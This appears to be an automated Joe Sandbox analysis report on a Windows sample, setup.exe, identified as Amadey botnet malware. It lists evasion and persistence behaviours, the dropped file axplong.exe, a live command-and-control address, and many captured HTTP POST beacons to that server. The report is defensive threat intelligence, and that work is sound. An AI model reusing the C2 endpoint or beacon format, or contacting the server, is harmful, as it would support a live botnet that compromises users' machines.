Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
setup.exe

Overview

General Information

Sample name:setup.exe
Analysis ID:1483214
MD5:c6620fe2690605f20f5b9c970e8130c6
SHA1:f5a500bab75cec90f2a004566cc61ef6484be12c
SHA256:ee170a14d676b69cab768f8a94e482ee9ad6dc1766038d6e26c24fe2cfbd7677
Tags:Amadeyexe
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • setup.exe (PID: 4476 cmdline: "C:\Users\user\Desktop\setup.exe" MD5: C6620FE2690605F20F5B9C970E8130C6)
    • axplong.exe (PID: 4600 cmdline: "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" MD5: C6620FE2690605F20F5B9C970E8130C6)
  • axplong.exe (PID: 7436 cmdline: C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe MD5: C6620FE2690605F20F5B9C970E8130C6)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": ["http://185.215.113.16/Jo89Ku7d/index.php"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.1247561021.0000000004610000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
    00000000.00000002.1335650088.0000000000C51000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      00000004.00000002.1346668514.0000000000A71000.00000040.00000001.01000000.00000008.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        0000000D.00000003.1562495489.0000000004900000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            13.2.axplong.exe.a70000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              4.2.axplong.exe.a70000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                0.2.setup.exe.c50000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Use Short Name Path in Command Line
                  Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, ParentCommandLine: "C:\Users\user\Desktop\setup.exe", ParentImage: C:\Users\user\Desktop\setup.exe, ParentProcessId: 4476, ParentProcessName: setup.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" , ProcessId: 4600, ProcessName: axplong.exe

                  Snort Signatures

                  No Snort rule has matched

                  Suricata Signatures

                  Timestamp:2024-07-26T21:02:19.708198+0200
                  SID:2022930
                  Source Port:443
                  Destination Port:49700
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T21:02:41.265101+0200
                  SID:2856147
                  Source Port:49710
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T21:02:33.652832+0200
                  SID:2856147
                  Source Port:49704
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T21:02:58.425645+0200
                  SID:2022930
                  Source Port:443
                  Destination Port:49725
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T21:02:37.109665+0200
                  SID:2856147
                  Source Port:49707
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T21:02:46.154334+0200
                  SID:2856147
                  Source Port:49714
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:2024-07-26T21:02:38.302527+0200
                  SID:2856147
                  Source Port:49708
                  Destination Port:80
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: setup.exeAvira: detected
                  Antivirus detection for URL or domain
                  Source: http://185.215.113.16/Jo89Ku7d/index.php%Avira URL Cloud: Label: phishing
                  Source: http://185.215.113.16/Jo89Ku7d/index.phpiAvira URL Cloud: Label: phishing
                  Source: http://185.215.113.16/Jo89Ku7d/index.phpdedSAvira URL Cloud: Label: phishing
                  Source: http://185.215.113.16/Jo89Ku7d/index.phpAvira URL Cloud: Label: phishing
                  Source: http://185.215.113.16/Jo89Ku7d/index.phpYAvira URL Cloud: Label: phishing
                  Source: http://185.215.113.16/Jo89Ku7d/index.php)Avira URL Cloud: Label: phishing
                  Source: http://185.215.113.16/Jo89Ku7d/index.phpHjaAvira URL Cloud: Label: phishing
                  Source: http://185.215.113.16/Jo89Ku7d/index.phpaAvira URL Cloud: Label: phishing
                  Source: http://185.215.113.16/Jo89Ku7d/index.phpdedAvira URL Cloud: Label: phishing
                  Source: http://185.215.113.16/Jo89Ku7d/index.phpncodedtAvira URL Cloud: Label: phishing
                  Source: http://185.215.113.16/Jo89Ku7d/index.phpIifAvira URL Cloud: Label: phishing
                  Source: http://185.215.113.16/Jo89Ku7d/index.php1Avira URL Cloud: Label: phishing
                  Source: http://185.215.113.16/Jo89Ku7d/index.php&iAvira URL Cloud: Label: phishing
                  Source: http://185.215.113.16/Jo89Ku7d/index.phpmkBAvira URL Cloud: Label: phishing
                  Source: http://185.215.113.16/Jo89Ku7d/index.phpUAvira URL Cloud: Label: phishing
                  Source: http://185.215.113.16/Jo89Ku7d/index.phpncodedAvira URL Cloud: Label: phishing
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                  Found malware configuration
                  Source: axplong.exe.7436.13.memstrminMalware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.16/Jo89Ku7d/index.php"]}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeReversingLabs: Detection: 57%
                  Multi AV Scanner detection for submitted file
                  Source: setup.exeReversingLabs: Detection: 55%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: setup.exeJoe Sandbox ML: detected
                  Source: setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

                  Networking

                  barindex
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorIPs: 185.215.113.16
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
                  Source: global trafficHTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
